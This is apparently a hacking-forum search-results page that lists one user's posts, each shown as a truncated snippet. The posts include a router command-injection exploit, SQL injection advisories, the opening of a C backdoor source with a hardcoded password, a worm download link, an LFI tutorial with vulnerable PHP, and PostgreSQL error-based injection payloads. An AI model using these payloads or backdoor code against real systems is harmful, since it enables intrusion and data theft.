Search results

  1. poqun

    TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit

    <html> <head> <title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title> <!-- # CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators # Command Injection(s) Discovered by: Jacob Holcomb & Kedy Liu - Security Analysts @ Independent Security...
  2. poqun

    RootPanel SQL Injection Vulnerability

    ============================================================ RootPanel (All versions) SQL injection/Account takeover. Discovery: AkaStep and CAMOUFL4G3 Vendor: http: //www.rootpanel.ru/ ============================================================ What is RootPanel ? RootPanel is professional...
  3. poqun

    Collabtive 1.0 XSS / Shell Upload / Privilege Escalation

    ============================================= - Release date: July 22th, 2013 - Discovered by: Enrico Cinquini - Severity: High ============================================= I. VULNERABILITY ------------------------- Collabtive multiple vulnerabilities. II. INTRODUCTION...
  4. poqun

    Malware Analyst's Cookbook and DVD

    A computer forensics "how-to" for fighting malicious code and analyzing incidents. With our ever-increasing reliance on computers comes an ever-growing risk of malware. Security professionals will find plenty of solutions in this book to the problems posed by viruses, Trojan horses, worms...
  5. poqun

    [Ebook]Hacking Exposed

    Hacking Exposed Computer Forensics, Second Edition:Computer Forensics Secrets & Solution The latest strategies for investigating cyber-crime Identify and investigate computer criminals of all stripes with help from this fully updated. real-world resource. Hacking Exposed Computer Forensics...
  6. poqun

    [Ebook]Python

    MongoDB and Python: Patterns and processes for the popular document-oriented database Learn how to leverage MongoDB with your Python applications, using the hands-on recipes in this book. You get complete code samples for tasks such as making fast geo queries for location-based apps...
  7. poqun

    6 Ethical Hacking Ebook

    1. CEHv7 The latest study guide for the Certified Ethical Hacker certification. If you are trying to become a certified ethical hacker, then obviously you are going to want this. 2. Grey Hat Hacking, 2nd Edition This is more than just about hacking. This book goes over several programming...
  8. poqun

    XSS Attacks : Cross Site Scripting Exploits &Defence

    Cross-site Scripting Fundamentals. The XSS Discovery Toolkit XSS Theory XSS Attack Methods Advanced XSS Attack Vectors XSS Exploited Exploit Frameworks XSS Worms Preventing XSS Attacks Download Link...
  9. poqun

    Pack with SQLi tutorials

    The following archive contains 7 amazing tutorials about SQL Injection, collected by me. Download: Hacking.zip
  10. poqun

    [E-Book] SQL Injection Attacks and Defense

    Content: Chapter 1 What Is SQL Injection? 1-Introduction 2-Understanding How Web Applications Work. 3-A Simple Application Architecture 4-A More Complex Architecture 5-Understanding SQL Injection 6-High-Profile Examples 7-Understanding How It Happens 8-Dynamic String Building 9-Incorrectly...
  11. poqun

    C backdoor src

    #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define ENTERPASS "Enert your password: \0" #define WELCOME "Welcome to shell\r\nlet's do it:\r\n" #define PASSWORD "Cyb3r" int main(int argc...
  12. poqun

    [C++] Win32.WormLabs

    Download: http://www.mediafire.com/?rkeojpxr2zbxcjq Password: level-23.biz
  13. poqun

    C++ tutorials for beginners codeblocks

    Download: http://www.codeblocks.org/downloads 1 - Installing CodeBlocks [video=youtube] 73 videos c++ tutorials http://www.youtube.com/playlist?list=PLAE85DE8440AA6B83&feature=plcp
  14. poqun

    How to use sleep function c++

    #include <iostream> #include <cstdio> #include <windows.h> using namespace std; int main() { cout << "1. mesaj"<<endl; Sleep(5000); cout << "2. mesaj"; getchar(); return 0; }
  15. poqun

    Use AutoIT functions in C++ code

    In the past,I was coding in the AutoIt language( a very easy one and very useful for automations ,eg: mouse clicks,sending keys,etc www.autoitscript.com But I left it because the compiled exes are native detected by antiviruses as False Positives -> SO FOR ALL THE MALWARE CODERS ,AutoIt IS THE...
  16. poqun

    Executable Code Injection

    By: Rashid Bhat November 09, 2012 Introduction Code injection is a process of injecting executable code in a running process or static executable. Executable code in web applications can be injected by exploiting them with XSS (cross site scripting), LFI (local file inclusion), or remote file...
  17. poqun

    SQL Injections: An Introduction

    SQL Injections: An Introduction[/B] Audi-1 January 07, 2013 According to the Open Web Application Security Project (OWASP), injection attacks are first on the list of the top 10 web vulnerabilities. Diving into these, SQL injections are responsible for a big chunk of...
  18. poqun

    C++ Keylogger

    Part1: Video 1 Part2: Video 2 Part3: Video 3 Part4: Video 4 Part5: Video 5
  19. poqun

    LFI Web Hacking Tutorial

    This tutorial will guide you into the process of exploiting a website through the LFI (Local File Inclusion). First lets take a look at a php code that is vulnerable to LFI: $page = $_GET[page]; include($page); ?> Now, this is a piece of code that should NEVER be used, because the $page isn...
  20. poqun

    PostGreSQL Injection

    Version database: and 1=cast(version() as int)-- Extract tables from the Database: and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)-- Next table: and 1=cast((select table_name from information_schema.tables where table_name not in ('TABLE') limit 1 offset 0)...
Top Bottom